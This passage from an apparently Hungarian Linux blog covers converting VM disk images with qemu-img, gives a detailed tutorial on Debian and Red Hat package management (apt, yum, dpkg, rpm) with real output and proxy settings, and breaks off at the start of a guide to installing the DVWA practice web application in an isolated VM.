# qemu-img convert -O qcow2 SmashTheTux-disk1.vmdk SmashTheTux-disk1.qcow2
# file SmashTheTux-disk1.qcow2 
SmashTheTux-disk1.qcow2: QEMU QCOW Image (v3), 2147483648 bytes

A VDI fájlokkat hasonlóképpen tudjuk qcow2 formátummá convertálni.

# qemu-img convert -f vdi -O qcow2 vmdisk.vdi vmdisk.qcow2

Ha elkészült a qcow2 fájl, akkor már csak be kell egy KVM virtuális gép alá csatolni és boot-olni róla.

Csomagkezelés Debian és Red Hat alapú rendszereken

Mon, 14 Mar 2016 16:58:19 +0100

Linux rendszereken a programok telepítése többféle módon történhet. Történhet úgy, hogy az előre lefordított programokat csak ki kell csomagolni, futtathatóvá tenni őket és kész. Ha úgy tetszik, akkor magunk fordíthatjuk és állíthatjuk be a programokat forráskódból. De a legelterjedtebb és legkényelmesebb módja a telepítéseknek, ha csomagkezelőt használunk. Ebben az esetben is kész, előre lefordított programot kapunk, de a telepítő csomagban benne van minden szükséges információ az adott programhoz. Alapértelmezett konfigurációs fájlok, dokumentációk, sőt még az is hogy milyen egyébb program csomagok szükségesek az adott program futtatásához és ezeket telepíti is vele. Több féle csomagformátum létezik a különböző disztibúciókban. A két legelterjedtebb a Debian féle deb és a Red Hat féle rpm. A csomagok beszerzése miatt sem kell aggódni, erre való a csomagkezelő. A csomagkezelő alapértelmezett beállításaiban megtalálhatóak a gyári hálózati tárolók, ahonnan biztonsággal telepíthetünk szinte bármilyen szükséges programot, de akár fel vehetünk harmadik fél által használt tárolókat is (de csak ha megbízunk a programok hitelességében). Bár a csomagformátumok különbözhetnek de a lényeg mindegyiknél ugyan az. Tudunk velük telepíteni, eltávolítani programokat, keresni a tárolókban, információt kérhetünk le adott csomagokról, függőségeikről stb. A deb és rpm csomagoknál is van alacsony (dpkg/rpm) és magas szintű (apt/yum) csomagkezelés. Az alacsony szintű csomagkezelést csak részben fogom érinteni, e leírásban inkább az APT (Advanced Packaging Tool) és a YUM (Yellowdog Updater Modifier) használatát mutatom be.

Csomag listák frissítése

Debian alapú rendszereken a csomag műveletek előtt ajánlatos a hálózati tárolók, helyben tárolt csomag adatait (cache) frissíteni. Ezt az apt-get update utasítással tehetjük meg.

# apt-get update
Mellőz http://ftp.bme.hu jessie InRelease
Találat http://ftp.bme.hu jessie-updates InRelease
Találat http://security.debian.org jessie/updates InRelease
...
Találat http://security.debian.org jessie/updates/main Translation-en     
Találat http://ftp.bme.hu jessie/main Translation-en                      
Letöltve 1.748 B 4mp alatt (395 B/s)              
Csomaglisták olvasása... Kész

A Red Hat alapú rendszereknél ilyen utasítás nincs, itt minden csomagművelet elött ezt a csomagkezelő megteszi.

Csomagok frissítése

Debian alapú rendszereknél, az apt-get update után kiadott apt-get upgrade megmutatja és felkínálja az elérhető csomag frissítéseket.

# apt-get upgrade
Csomaglisták olvasása... Kész
Függőségi fa építése       
Állapotinformációk olvasása... Kész
Frissítés kiszámítása... Kész
Az alábbi csomagok frissítve lesznek:
  bind9-host dnsutils libbind9-90 libdns-export100 libdns100 libirs-export91 libisc-export95 libisc95 libisccc90 libisccfg-export90 libisccfg90 liblwres90
  libssl1.0.0 linux-image-3.16.0-4-686-pae perl perl-base perl-modules
17 frissített, 0 újonnan telepített, 0 eltávolítandó és 0 nem frissített.
Letöltendő adatmennyiség: 43,5 MB.
A művelet után 389 kB lemezterület kerül felhasználásra.
Folytatni akarja? [I/n]

A -V kapcsolót használva, ellenőrizhetjük az elérhető frissítések verziószámait is.

# apt-get upgrade -V
Csomaglisták olvasása... Kész
Függőségi fa építése       
Állapotinformációk olvasása... Kész
Frissítés kiszámítása... Kész
Az alábbi csomagok frissítve lesznek:
   bind9-host (9.9.5.dfsg-9+deb8u5 => 9.9.5.dfsg-9+deb8u6)
   dnsutils (9.9.5.dfsg-9+deb8u5 => 9.9.5.dfsg-9+deb8u6)
   libbind9-90 (9.9.5.dfsg-9+deb8u5 => 9.9.5.dfsg-9+deb8u6)
...
   perl (5.20.2-3+deb8u3 => 5.20.2-3+deb8u4)
   perl-base (5.20.2-3+deb8u3 => 5.20.2-3+deb8u4)
   perl-modules (5.20.2-3+deb8u3 => 5.20.2-3+deb8u4)
17 frissített, 0 újonnan telepített, 0 eltávolítandó és 0 nem frissített.
Letöltendő adatmennyiség: 43,5 MB.
A művelet után 389 kB lemezterület kerül felhasználásra.
Folytatni akarja? [I/n]

Egy -y kapcsolóval kikényszeríthetünk egy igenleges választ, a frissítés folytatására. Én nem használom, mivel szeretem átfutni a frissítések listáját mielött telepítem őket.

Ha nem szeretnénk az összeset, csak egy vagy több adott csomagot frissíteni, akkor használjuk az adott csomagok nevét az utasításhoz pl. apt-get upgrade dnsutils. Persze itt számolni kell azzal, hogy a függőségeket is frissíteni kell vele együtt, mert azok hiányában ez nem sikerülhet.

# apt-get upgrade bind9-host -V
Csomaglisták olvasása... Kész
Függőségi fa építése       
Állapotinformációk olvasása... Kész
Frissítés kiszámítása... Néhány csomagot nem lehetett telepíteni. Ez azt jelentheti, hogy
egy lehetetlen állapotot kért, vagy ha az unstable disztribúciót
használja, akkor néhány igényelt csomag még nem készült el vagy ki
lett mozdítva az Incoming-ból.
Az alábbi információk segíthetnek megoldani a problémát:

Az alábbi csomagoknak teljesítetlen függőségei vannak:
 dnsutils : Függ ettől: libbind9-90 (= 1:9.9.5.dfsg-9+deb8u5) de csak 1:9.9.5.dfsg-9+deb8u6 telepíthető
            Függ ettől: libdns100 (= 1:9.9.5.dfsg-9+deb8u5) de csak 1:9.9.5.dfsg-9+deb8u6 telepíthető
            Függ ettől: libisc95 (= 1:9.9.5.dfsg-9+deb8u5) de csak 1:9.9.5.dfsg-9+deb8u6 telepíthető
            Függ ettől: libisccfg90 (= 1:9.9.5.dfsg-9+deb8u5) de csak 1:9.9.5.dfsg-9+deb8u6 telepíthető
            Függ ettől: liblwres90 (= 1:9.9.5.dfsg-9+deb8u5) de csak 1:9.9.5.dfsg-9+deb8u6 telepíthető
E: Törött csomagok

A másik utasítás amivel a rendszerünket frissíthetjük, az az apt-get dist-upgrade. Ezt akkor használjuk, ha a disztribúció frissült pl. Debian 7-röl 8-ra. A dist-upgrade lefutása és a rendszer újraindítása után ajánlott egy apt-get update és egy apt-get upgrade lefuttatása is.

Red Hat alapú rendszereknél a yum check-update utasítással ellenőrizhetjük, hogy vannak-e elérhető frissítések a rendszerünkhöz. Ha van, akkor kapunk egy listát a csomagokról és azok verziójáról. Az utasítás visszatérési értéke 0 ha nincsenek és 100 ha vannak frissítések. Ez hasznos lehet ha szkriptben szeretnénk használni. A visszatérési értéket az echo $? paranccsal kérhetjük le.

# yum check-update
Betöltött bővítmények: fastestmirror
Loading mirror speeds from cached hostfile
 * base: ftp.freepark.org
 * extras: ftp.freepark.org
 * updates: ftp.freepark.org

avahi-autoipd.x86_64                      0.6.31-15.el7_2.1                 updates
avahi-libs.x86_64                         0.6.31-15.el7_2.1                 updates
bind-libs-lite.x86_64                     32:9.9.4-29.el7_2.2               updates
...
systemd-sysv.x86_64                       219-19.el7_2.4                    updates
tuned.noarch                              2.5.1-4.el7_2.2                   updates
tzdata.noarch                             2016a-1.el7                       updates
# echo $?
100

A yum update utasítással telepíthetjük az elérhető frissítéseket. Ha viszont csak pár csomagot szeretnénk frissíteni, akkor itt is szintén felsorolhatjuk az adott csomagok nevét a parancs végén.

# yum update
Betöltött bővítmények: fastestmirror
Loading mirror speeds from cached hostfile
 * base: ftp.freepark.org
 * extras: ftp.freepark.org
 * updates: ftp.freepark.org
Függőségek megállapítása
--> Tranzakció ellenőrzés futtatása
---> A(z) avahi-autoipd.x86_64 0:0.6.31-15.el7 csomaggal a következő történik: frissítve
---> A(z) avahi-autoipd.x86_64 0:0.6.31-15.el7_2.1 csomaggal a következő történik: egy frissítés
---> A(z) avahi-libs.x86_64 0:0.6.31-15.el7 csomaggal a következő történik: frissítve
...
---> A(z) tuned.noarch 0:2.5.1-4.el7_2.2 csomaggal a következő történik: egy frissítés
---> A(z) tzdata.noarch 0:2015g-1.el7 csomaggal a következő történik: frissítve
---> A(z) tzdata.noarch 0:2016a-1.el7 csomaggal a következő történik: egy frissítés
--> A függőségvizsgálat véget ért

Függőségek Megtalálva

===========================================================================================================
 Package                          Arch            Verzió                            Tároló           Méret
===========================================================================================================
Telepítés:
 kernel                           x86_64          3.10.0-327.10.1.el7               updates           33 M
Frissítés:
 avahi-autoipd                    x86_64          0.6.31-15.el7_2.1                 updates           39 k
 avahi-libs                       x86_64          0.6.31-15.el7_2.1                 updates           61 k
 bind-libs-lite                   x86_64          32:9.9.4-29.el7_2.2               updates          724 k
...
 systemd-sysv                     x86_64          219-19.el7_2.4                    updates           52 k
 tuned                            noarch          2.5.1-4.el7_2.2                   updates          193 k
 tzdata                           noarch          2016a-1.el7                       updates          431 k

Tranzakció Összegzés
===========================================================================================================
Telepítés   1 Package
Frissítés  46 Packages

Teljes letöltési méret: 83 M
Is this ok [y/d/N]:

És ha csak egy csomagot szeretnénk frissíteni…

# yum update tzdata
Betöltött bővítmények: fastestmirror
Loading mirror speeds from cached hostfile
 * base: ftp.freepark.org
 * extras: ftp.freepark.org
 * updates: ftp.freepark.org
Függőségek megállapítása
--> Tranzakció ellenőrzés futtatása
---> A(z) tzdata.noarch 0:2015g-1.el7 csomaggal a következő történik: frissítve
---> A(z) tzdata.noarch 0:2016a-1.el7 csomaggal a következő történik: egy frissítés
--> A függőségvizsgálat véget ért

Függőségek Megtalálva

===========================================================================================================
 Package                Arch                   Verzió                        Tároló                  Méret
===========================================================================================================
Frissítés:
 tzdata                 noarch                 2016a-1.el7                   updates                 431 k

Tranzakció Összegzés
===========================================================================================================
Frissítés  1 Package

Teljes letöltési méret: 431 k
Is this ok [y/d/N]: y
Downloading packages:
Delta RPMs disabled because /usr/bin/applydeltarpm not installed.
warning: /var/cache/yum/x86_64/7/updates/packages/tzdata-2016a-1.el7.noarch.rpm: Header V3 RSA/SHA256 Signature, key ID f4a80eb5: NOKEY
A publikus kulcs nincs telepítve a következőhöz: tzdata-2016a-1.el7.noarch.rpm
tzdata-2016a-1.el7.noarch.rpm                                                       | 431 kB  00:00:00     
GPG kulcs beszerzése a következőből: file:///etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-7
A(z) GPG kulcs importálása 0xF4A80EB5:
 Felhasználó: "CentOS-7 Key (CentOS 7 Official Signing Key) <security@centos.org>"
 Ujjlenyomat: 6341 ab27 53d7 8a78 a7c2 7bb1 24c6 a8a7 f4a8 0eb5
 Csomag       : centos-release-7-2.1511.el7.centos.2.10.x86_64 (@anaconda)
 Származás  : /etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-7
Ez így jó? [y/N]:y
Running transaction check
Running transaction test
Transaction test succeeded
Running transaction
  Frissítés     : tzdata-2016a-1.el7.noarch                                                            1/2 
  Tisztítás     : tzdata-2015g-1.el7.noarch                                                            2/2 
  Ellenőrzés    : tzdata-2016a-1.el7.noarch                                                            1/2 
  Ellenőrzés    : tzdata-2015g-1.el7.noarch                                                            2/2 

Frissítve:
  tzdata.noarch 0:2016a-1.el7                                                                              

Kész!

Mint láthatjuk, a telepítő jelzi, hogy a CentOS-7 Key (CentOS 7 Official Signing Key) még nincs telepítve, így ezt most megtehetjük. De mielött megtesszük, ellenőrizzük a CentOS weboldalán(link) hogy a kulcs új-lenyomata egyezzen. Mivel a kulcs rendben van, így bekerült a GPG kulcsok közé a /etc/pki/rpm-gpg mappába és a csomagkezelő most már innen használja.

Red Hat alapú rendszereknél a dist-upgrade megfelelője a yum upgrade. Mindkét rendszernél (Debian és Red Hat alapúaknál) ha a kernel frissül akkor szükséges egy újraindítás, hogy a friss kernel használatba kerüljön.

Csomagok keresése

Debian alapú rendszereken ha keresni akarunk az elérhető csomagok között, akkor ezt az apt-cache search utasítással tehetjük meg. Persze ne felejtsük el előtte az apt-get update-el frissíteni a csomag listát.

# apt-cache search htop
aha - ANSI color to HTML converter
htop - interactive processes viewer
libauthen-oath-perl - Perl module for OATH One Time Passwords

Red Hat alapú rendszereken ez hasonlóan történik a yum search-el.

# yum search nano
Betöltött bővítmények: fastestmirror
Loading mirror speeds from cached hostfile
 * base: ftp.freepark.org
 * extras: ftp.freepark.org
 * updates: ftp.freepark.org
================================ N/S matched: nano ================================
nano.x86_64 : A small text editor

 Csak a név és a leírás egyezik, használja a "search all" parancsot továbbiak kereséséhez.

Csomagok telepítése

Ha meg találtuk a keresett csomagot, akkor telepíthetjük is az apt-get install-al. Az esetleges törött függőségeket az apt-get -f install utasítással tudjuk javítani.

# apt-get install htop -V
Csomaglisták olvasása... Kész
Függőségi fa építése       
Állapotinformációk olvasása... Kész
Javasolt csomagok:
   strace (4.9-2)
   ltrace (0.7.3-4)
Az alábbi ÚJ csomagok lesznek telepítve:
   htop (1.0.3-1)
0 frissített, 1 újonnan telepített, 0 eltávolítandó és 0 nem frissített.
Letöltendő adatmennyiség: 74,0 kB.
A művelet után 205 kB lemezterület kerül felhasználásra.
Letöltés:1 http://ftp.bme.hu/debian/ jessie/main htop i386 1.0.3-1 [74,0 kB]
Letöltve 74,0 kB 0mp alatt (287 kB/s)
A korábban ki nem választott htop csomag kiválasztása.
(Adatbázis olvasása ... 21201 fájl és könyvtár van jelenleg telepítve.)
Kibontás előkészítése: .../archives/htop_1.0.3-1_i386.deb ...
Kibontás: htop (1.0.3-1) ...
Aktiválók feldolgozása: man-db (2.7.0.2-5) ...
Beállítás: htop (1.0.3-1) ...

Illetve Red Hat alapú rendszereken yum install-al.

# yum install nano
Betöltött bővítmények: fastestmirror
Loading mirror speeds from cached hostfile
 * base: ftp.freepark.org
 * extras: ftp.freepark.org
 * updates: ftp.freepark.org
Függőségek megállapítása
--> Tranzakció ellenőrzés futtatása
---> A(z) nano.x86_64 0:2.3.1-10.el7 csomaggal a következő történik: telepítve
--> A függőségvizsgálat véget ért

Függőségek Megtalálva

===================================================================================
 Package         Arch              Verzió                    Tároló          Méret
===================================================================================
Telepítés:
 nano            x86_64            2.3.1-10.el7              base            440 k

Tranzakció Összegzés
===================================================================================
Telepítés  1 Package

Teljes letöltési méret: 440 k
Telepített méret: 1.6 M
Is this ok [y/d/N]: y
Downloading packages:
nano-2.3.1-10.el7.x86_64.rpm                                | 440 kB  00:00:00     
Running transaction check
Running transaction test
Transaction test succeeded
Running transaction
  Telepítés     : nano-2.3.1-10.el7.x86_64                                     1/1 
  Ellenőrzés    : nano-2.3.1-10.el7.x86_64                                     1/1 

Telepítve:
  nano.x86_64 0:2.3.1-10.el7                                                       

Kész!

Mind két esetben több csomagot is lehet egyszerre telepíteni, ez esetben csak fel kell sorolni a kívánt csomagokat, apt-get install csomag1 csomag2 ....

Telepített csomagok

Ha meg szeretnénk nézni a feltelepített csomagok listáját, akkor Debian alapú rendszereken ezt a dpkg -l utasítással tehetjük meg.

# dpkg -l
Kért=ismeretlen(u)/telepítés(i)/eltávolítás(r)/törlés(p)/tartás(h)
| Állapot=nem(n)/telepített(i)/ütköző-fájlok(c)/kibontatlan(u)/félig-
|     ütköző(f)/félig-telepített(h)/aktiválóra-vár(w)/aktiváló-függőben(t)
|/ Hiba?=(nem)/újratelepítés-szükséges(r) (Állapot,Hiba: nagybetű=rossz)
||/ Név            Verzió       Architektúra Leírás
+++-==============-============-============-==================================
ii  acl            2.2.52-2     i386         Access control list utilities
ii  acpi           1.7-1        i386         displays information on ACPI devic
ii  acpi-support-b 0.142-6      all          scripts for handling base ACPI eve
...
ii  xkb-data       2.12-1       all          X Keyboard Extension (XKB) configu
ii  xml-core       0.13+nmu2    all          XML infrastructure and XML catalog
ii  zlib1g:i386    1:1.2.8.dfsg i386         compression library - runtime

Ennek eredménye egy jó hosszú lista amit a grep utasítással szűkíthetünk.

# dpkg -l | grep image
ii  linux-base                    3.5                         all          Linux image base package
ii  linux-image-3.16.0-4-686-pae  3.16.7-ckt20-1+deb8u4       i386         Linux 3.16 for modern PCs
ii  linux-image-686-pae           3.16+63                     i386         Linux for modern PCs (meta-package)

Red Hat alapú rendszereknél a yum list installed vagy az rpm -qa utasítással tehetjük meg ugyanezt.

# yum list installed
Betöltött bővítmények: fastestmirror
Loading mirror speeds from cached hostfile
 * base: ftp.freepark.org
 * extras: ftp.freepark.org
 * updates: ftp.freepark.org
Telepített csomagok
NetworkManager.x86_64                 1:1.0.6-27.el7                      @anaconda
NetworkManager-libnm.x86_64           1:1.0.6-27.el7                      @anaconda
NetworkManager-tui.x86_64             1:1.0.6-27.el7                      @anaconda
...
yum-metadata-parser.x86_64            1.1.4-10.el7                        @anaconda
yum-plugin-fastestmirror.noarch       1.1.31-34.el7                       @anaconda
zlib.x86_64                           1.2.7-15.el7                        @anaconda

Ezek szintén hosszú listák, de a grep-el itt is célzottan szűkithetünk.

# rpm -qa | grep nano
nano-2.3.1-10.el7.x86_64
# yum list installed | grep nano
nano.x86_64                         2.3.1-10.el7                       @base

Csomag információk

Egy adott csomagról mindent megtudhatunk az apt-cache showpkg utasítással. A függőségeit, hogy mely csomagok függnek tőle, verzióját és az MD5 ellenőrző kódját.

# apt-cache showpkg htop
Package: htop
Versions: 
1.0.3-1 (/var/lib/apt/lists/ftp.bme.hu_debian_dists_jessie_main_binary-i386_Packages) (/var/lib/dpkg/status)
 Description Language: 
                 File: /var/lib/apt/lists/ftp.bme.hu_debian_dists_jessie_main_binary-i386_Packages
                  MD5: 8eb5aa19b3c92a975dc78e2165f6688d
 Description Language: en
                 File: /var/lib/apt/lists/ftp.bme.hu_debian_dists_jessie_main_i18n_Translation-en
                  MD5: 8eb5aa19b3c92a975dc78e2165f6688d


Reverse Depends: 
  util-vserver,htop
  lava-dispatcher,htop
  education-common,htop
Dependencies: 
1.0.3-1 - libc6 (2 2.15) libncursesw5 (2 5.6+20070908) libtinfo5 (0 (null)) strace (0 (null)) ltrace (0 (null)) 
Provides: 
1.0.3-1 - 
Reverse Provides:

Ha csak a függőségekre vagyunk kíváncsiak, akkor azt az apt-cache depends és apt-cache rdepends-el is lekérdezhetjük.

# apt-cache depends htop
htop
  Függ ettől: libc6
  Függ ettől: libncursesw5
  Függ ettől: libtinfo5
  Javasolja: strace
  Javasolja: ltrace
# apt-cache rdepends htop
htop
Reverse Depends:
  util-vserver
  lava-dispatcher
  education-common

Az adott csomagban levő fájlokat az apt-file list mutatja meg nekünk. Ez nem az apt csomag része, ezt külön kell telepítünk az apt-get install apt-file utasítással. Telepítés után az apt-file adatbázisát aktualizálni kell, az apt-file update-el.

# apt-file update
Downloading complete file http://ftp.bme.hu/debian/dists/jessie/main/Contents-i386.gz
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 26.2M  100 26.2M    0     0  2696k      0  0:00:09  0:00:09 --:--:-- 2757k
Ignoring source without Contents File:
  http://security.debian.org/dists/jessie/updates/main/Contents-i386.gz
Downloading complete file http://ftp.bme.hu/debian/dists/jessie-updates/main/Contents-i386.gz
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 22841  100 22841    0     0   212k      0 --:--:-- --:--:-- --:--:--  214k

Most már jöhet a listázás.

# apt-file list htop
htop: /usr/bin/htop
htop: /usr/share/applications/htop.desktop
htop: /usr/share/doc/htop/AUTHORS
htop: /usr/share/doc/htop/README
htop: /usr/share/doc/htop/changelog.Debian.gz
htop: /usr/share/doc/htop/changelog.gz
htop: /usr/share/doc/htop/copyright
htop: /usr/share/man/man1/htop.1.gz
htop: /usr/share/menu/htop
htop: /usr/share/pixmaps/htop.png

Red Hat alapú rendszereken is hasonló az eljárás. Itt az információt az adott csomagról a yum info mutatja meg.

# yum info nano
Betöltött bővítmények: fastestmirror
Loading mirror speeds from cached hostfile
 * base: ftp.freepark.org
 * extras: ftp.freepark.org
 * updates: ftp.freepark.org
Telepített csomagok
Név         : nano
Arch        : x86_64
Verzió      : 2.3.1
Kiadás      : 10.el7
Méret       : 1.6 M
Tároló      : installed
Tárolóból   : base
Összegzés   : A small text editor
URL         : http://www.nano-editor.org
Licenc      : GPLv3+
Leírás      : GNU nano is a small and friendly text editor.

Azt hogy az adott csomagnak mik a függőségei és tőle mely csomagok függnek, itt az rpm -qR és rpm -q --whatrequires utasítással deríthető ki.

# rpm -qR nano
/bin/sh
/bin/sh
/sbin/install-info
/sbin/install-info
config(nano) = 2.3.1-10.el7
libc.so.6()(64bit)
libc.so.6(GLIBC_2.11)(64bit)
libc.so.6(GLIBC_2.14)(64bit)
libc.so.6(GLIBC_2.2.5)(64bit)
libc.so.6(GLIBC_2.3)(64bit)
libc.so.6(GLIBC_2.3.4)(64bit)
libc.so.6(GLIBC_2.4)(64bit)
libc.so.6(GLIBC_2.6)(64bit)
libncursesw.so.5()(64bit)
libtinfo.so.5()(64bit)
rpmlib(CompressedFileNames) <= 3.0.4-1
rpmlib(FileDigests) <= 4.6.0-1
rpmlib(PayloadFilesHavePrefix) <= 4.0-1
rtld(GNU_HASH)
rpmlib(PayloadIsXz) <= 5.2-1
# rpm -q --whatrequires 'config(nano)'
nano-2.3.1-10.el7.x86_64

Az adott csomag fájljait itt szintén egy külön csomaggal lehet megnézni, a repoquery-vel. Ezt a yum install yum-utils utasítással tudjuk telepíteni.

# yum install yum-utils
Betöltött bővítmények: fastestmirror
Loading mirror speeds from cached hostfile
 * base: ftp.freepark.org
 * extras: ftp.freepark.org
 * updates: ftp.freepark.org
Függőségek megállapítása
--> Tranzakció ellenőrzés futtatása
---> A(z) yum-utils.noarch 0:1.1.31-34.el7 csomaggal a következő történik: telepítve
--> A(z) python-kitchen függőség feldolgozása a következő csomaghoz: yum-utils-1.1.31-34.el7.noarch
--> Tranzakció ellenőrzés futtatása
---> A(z) python-kitchen.noarch 0:1.1.1-5.el7 csomaggal a következő történik: telepítve
--> A(z) python-chardet függőség feldolgozása a következő csomaghoz: python-kitchen-1.1.1-5.el7.noarch
--> Tranzakció ellenőrzés futtatása
---> A(z) python-chardet.noarch 0:2.2.1-1.el7_1 csomaggal a következő történik: telepítve
--> A függőségvizsgálat véget ért

Függőségek Megtalálva

===================================================================================
 Package                Arch           Verzió                   Tároló       Méret
===================================================================================
Telepítés:
 yum-utils              noarch         1.1.31-34.el7            base         113 k
Telepítés a függőségeknek:
 python-chardet         noarch         2.2.1-1.el7_1            base         227 k
 python-kitchen         noarch         1.1.1-5.el7              base         267 k

Tranzakció Összegzés
===================================================================================
Telepítés  1 Package (+2 Függőben lévő csomagok)

Teljes letöltési méret: 607 k
Telepített méret: 2.8 M
Is this ok [y/d/N]: y
Downloading packages:
(1/3): python-kitchen-1.1.1-5.el7.noarch.rpm                | 267 kB  00:00:00     
(2/3): python-chardet-2.2.1-1.el7_1.noarch.rpm              | 227 kB  00:00:01     
(3/3): yum-utils-1.1.31-34.el7.noarch.rpm                   | 113 kB  00:00:01     
-----------------------------------------------------------------------------------
Összesen                                              295 kB/s | 607 kB  00:02     
Running transaction check
Running transaction test
Transaction test succeeded
Running transaction
  Telepítés     : python-chardet-2.2.1-1.el7_1.noarch                          1/3 
  Telepítés     : python-kitchen-1.1.1-5.el7.noarch                            2/3 
  Telepítés     : yum-utils-1.1.31-34.el7.noarch                               3/3 
  Ellenőrzés    : python-kitchen-1.1.1-5.el7.noarch                            1/3 
  Ellenőrzés    : yum-utils-1.1.31-34.el7.noarch                               2/3 
  Ellenőrzés    : python-chardet-2.2.1-1.el7_1.noarch                          3/3 

Telepítve:
  yum-utils.noarch 0:1.1.31-34.el7                                                 

Függőség Telepítve:
  python-chardet.noarch 0:2.2.1-1.el7_1     python-kitchen.noarch 0:1.1.1-5.el7    

Kész!

És így már jöhet a listázás.

# repoquery --list nano
/etc/nanorc
/usr/bin/nano
/usr/bin/rnano
...
/usr/share/nano/tcl.nanorc
/usr/share/nano/tex.nanorc
/usr/share/nano/xml.nanorc

Csomagok eltávolítása

Debian alapú rendszerek esetén a már nem szükséges csomagokat az apt-get remove utasítással távolíthatjuk el. Ez eltávolítja ugyan a csomagot, de meghagyja a beállítás és konfigurációs fájlokat.

# apt-get remove htop
Csomaglisták olvasása... Kész
Függőségi fa építése       
Állapotinformációk olvasása... Kész
Az alábbi csomagok el lesznek TÁVOLÍTVA:
  htop
0 frissített, 0 újonnan telepített, 1 eltávolítandó és 0 nem frissített.
A művelet után 205 kB lemezterület szabadul fel.
Folytatni akarja? [I/n] 
(Adatbázis olvasása ... 21700 fájl és könyvtár van jelenleg telepítve.)
Eltávolítás: htop (1.0.3-1) ...
Aktiválók feldolgozása: man-db (2.7.0.2-5) ...

Ha ezekkel együtt szeretnénk eltávolítani az adott csomagot, akkor az apt-get purge utasítást használjuk.

# apt-get purge bind9

A különböző függőségek miatt telepített és már feleslegessé vált csomagokat az apt-get autoremove távolítja el.

# apt-get autoremove

A telepített csomagok deb fájljai a /var/cache/apt/archives mappában tárolódnak. Az apt-get autoclean utasítással törölhetőek azon deb csomagok amelyekre már nincs szükség.

# apt-get autoclean
Csomaglisták olvasása... Kész
Függőségi fa építése       
Állapotinformációk olvasása... Kész
Del libirs-export91 1:9.9.5.dfsg-9+deb8u5 [39,2 kB]
Del libdns-export100 1:9.9.5.dfsg-9+deb8u5 [486 kB]
Del liblwres90 1:9.9.5.dfsg-9+deb8u5 [54,5 kB]
Del libdns100 1:9.9.5.dfsg-9+deb8u5 [733 kB]
Del libisc95 1:9.9.5.dfsg-9+deb8u5 [177 kB]
Del libisccfg-export90 1:9.9.5.dfsg-9+deb8u5 [42,1 kB]
Del libisccc90 1:9.9.5.dfsg-9+deb8u5 [37,1 kB]
Del bind9-host 1:9.9.5.dfsg-9+deb8u5 [71,9 kB]
Del dnsutils 1:9.9.5.dfsg-9+deb8u5 [124 kB]
Del linux-image-3.16.0-4-686-pae 3.16.7-ckt20-1+deb8u3 [33,4 MB]
Del libbind9-90 1:9.9.5.dfsg-9+deb8u5 [45,1 kB]
Del libisc-export95 1:9.9.5.dfsg-9+deb8u5 [146 kB]
Del libisccfg90 1:9.9.5.dfsg-9+deb8u5 [57,1 kB]

Az apt-get clean viszont törli az összes deb csomagot a /var/cache/apt/archives mappából ezzel sok tárterületet megtakarítva.

# apt-get clean

Red Hat alapú rendszereken a yum remove utasítás távolítja el a nem kívánt csomagot, az összes, már nem szükséges függőségével együtt.

# yum remove nano
Betöltött bővítmények: fastestmirror
Függőségek megállapítása
--> Tranzakció ellenőrzés futtatása
---> A(z) nano.x86_64 0:2.3.1-10.el7 csomaggal a következő történik: törölve
--> A függőségvizsgálat véget ért

Függőségek Megtalálva

===================================================================================
 Package         Arch              Verzió                   Tároló           Méret
===================================================================================
Eltávolítás:
 nano            x86_64            2.3.1-10.el7             @base            1.6 M

Tranzakció Összegzés
===================================================================================
Eltávolítás  1 Package

Telepített méret: 1.6 M
Ez így jó? [y/N]:y
Downloading packages:
Running transaction check
Running transaction test
Transaction test succeeded
Running transaction
  Törlés        : nano-2.3.1-10.el7.x86_64                                     1/1 
  Ellenőrzés    : nano-2.3.1-10.el7.x86_64                                     1/1 

Eltávolítva:
  nano.x86_64 0:2.3.1-10.el7                                                       

Kész!

Élet egy proxy mögött

Az apt csomagnak Debian alapú rendszerek alatt, a konfigurációs fájljában tudjuk megadni a proxy beállításokat, ha olyan a hálózat, hogy a telepítés és frissítés csak azon keresztül lehetséges. Ehhez hozzunk létre egy 90Proxy fájlt a /etc/apt/apt.conf.d mappában a következő tartalommal.

# nano /etc/apt/apt.conf.d/90Proxy
Acquire::http::Proxy "http://proxy_IP_cím:proxy_port";

Jelszavas proxy esetén pedig

# nano /etc/apt/apt.conf.d/90Proxy
Acquire::http::Proxy "http://proxy_felhasználó:proxy_jelszó@proxy_IP_cím:proxy_port";

Rde Hat alapú rendszereknél a /etc/yum.conf fájlba kell szerkesztenünk.

# nano /etc/yum.conf
proxy=http://proxy_IP_cím:proxy_port

Ha jelszavas a proxy, akkor pedig

# nano /etc/yum.conf
proxy=http://proxy_IP_cím:proxy_port
proxy_username=proxy_felhasználó
proxy_password=proxy_jelszó

Mind két rendszernél (Debian és Red Hat alapúnál) a proxy beállításokat környezeti változókba is tehetjük.

# http_proxy="http://proxy_IP_cím:proxy_port"
# export http_proxy

Vagy ha jelszavas a proxy, akkor

# http_proxy="http://proxy_felhsználó:proxy_jelszó@proxy_IP_cím:proxy_port"
# export http_proxy

Persze ezek csak az adott shell-ben lesznek érvényben, ha tartósan be akarjuk állítani, akkor tehetjük profilba rendszer vagy felhasználó szinten.

Ez elég hosszúra sikeredett, de remélem érthető lett.

Damn Vulnerable Web Aplication (DVWA) telepítése

Sun, 13 Mar 2016 10:27:57 +0100

A Damn Vulnerable Web Aplication - továbbiakban DVWA (link) - egy olyan webalkalmazás, amely etikus hekkereknek, webes biztonságtechnikai szakembereknek, web fejlesztőknek lett létrehozva, hogy kipróbálják és gyakorolják a különböző sebezhetőségek feltárását, működését, azaz egyfajta gyakorlótér. Rengeteg sebezhetőség fajtát lehet kipróbálni, gyakorolni, különböző nehézségi szinten.

Telepítés

Ajánlott egy szeparált virtuális környezetbe telepíteni a rendszert a sok kihasználható sebezhetőség miatt. Tehát semmiképp se tegyük egy internetről elérhető gépre. A telepítés viszonylag egyszerű, mivel csak egy web kiszolgáló php-vel és egy mysql adatbázis szerver kell neki. Én egy minimális Debian rendszerre fogom felrakni, ennek a telepítését nem részletezem. A lényeg, hogy nem kell semmi extra, de egy ssh szervert azért tegyünk fel, hogy a DVWA könnyebb beállításához, be tudjunk ssh-zni.

# apt-get install openssh-server
...

Ha az alap szerver kész, akkor jöhetnek a szükséges csomagok, apache2, mysql, php5 és egy unzip a letöltött rendszer kicsomagolásához.

# apt-get install apache2 mysql-server php5 php5-mysql php5-pear* unzip

